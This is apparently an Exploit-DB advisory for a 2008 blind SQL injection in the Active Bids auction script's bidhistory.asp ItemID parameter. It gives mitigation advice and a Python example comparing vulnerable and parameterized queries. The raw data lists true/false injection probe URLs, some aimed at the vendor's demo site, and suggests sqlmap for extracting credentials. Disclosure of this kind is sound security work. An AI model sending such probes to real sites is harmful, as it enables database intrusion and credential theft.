Vendor: Active Bids
By: Mountassif Moad
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Active Bids
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote Blind SQL Injection Vulnerability

Active Bids, developed by www.activewebsoftwares.com, is vulnerable to remote blind SQL injection through the ItemID parameter of bidhistory.asp. The flaw is triggered by a crafted HTTP request; the advisory demonstrates it with a pair of requests, http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1 and http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0, whose differing responses show whether the injected condition evaluated true or false. An attacker who can tell the two responses apart can use this true/false oracle to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Developers should ensure that user input is validated before it is used in a SQL query, and should use parameterized queries rather than building SQL strings by concatenation, so that input is always treated as data and never as SQL.
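To make the mitigation concrete, the following added example (not code from Active Bids, whose classic-ASP source is not on this page) contrasts a query built by string concatenation with a validated, parameterized one, and checks whether the advisory's two probe values produce different result sets. The table and column names and the sqlite3 in-memory database are assumptions standing in for the product's own schema.

```python
import re
import sqlite3

# Constructed in-memory database standing in for the bid history table;
# table and column names are assumptions, not taken from the product.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE bidhistory (ItemID INTEGER, bidder TEXT, amount REAL);"
        "INSERT INTO bidhistory VALUES (354, 'alice', 10.0), (354, 'bob', 12.5),"
        " (355, 'carol', 3.0);"
    )
    return conn


def bid_history_vulnerable(conn, item_id):
    # The anti-pattern behind bidhistory.asp?ItemID=...: the raw query-string
    # value is pasted into the SQL text, so "and 1=1" / "and 1=0" become part
    # of the WHERE clause and change which rows (if any) come back.
    sql = "SELECT bidder, amount FROM bidhistory WHERE ItemID = " + item_id
    return conn.execute(sql + " ORDER BY bidder").fetchall()


def bid_history_safe(conn, item_id):
    # Validate the type first (ItemID is numeric), then bind it as a parameter
    # so the database engine only ever sees it as a value, never as SQL text.
    if not re.fullmatch(r"[0-9]+", item_id):
        raise ValueError("ItemID must be a non-negative integer")
    sql = "SELECT bidder, amount FROM bidhistory WHERE ItemID = ? ORDER BY bidder"
    return conn.execute(sql, (int(item_id),)).fetchall()


def blind_oracle_visible(query_func):
    # True when the two probe strings from the advisory yield different result
    # sets, i.e. when the page would leak a true/false oracle to a client.
    conn = make_db()
    try:
        true_rows = query_func(conn, "354 and 1=1")
        false_rows = query_func(conn, "354 and 1=0")
    except ValueError:
        return False  # input rejected before any query ran
    return true_rows != false_rows


if __name__ == "__main__":
    print("vulnerable leaks oracle:", blind_oracle_visible(bid_history_vulnerable))
    print("parameterized leaks oracle:", blind_oracle_visible(bid_history_safe))
```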
Exploit-DB raw data:

 [~]Type     : Remote Blind SQL Injection Vulnerability
 [~]Vendor   : www.activewebsoftwares.com
 [~]Software : Active Bids
 [~]Author   : Mountassif Moad

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0

Demo :

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0


# You can exploit the bug with automatic blind SQL injection tools such as sqlmap or ...

# milw0rm.com [2008-11-29]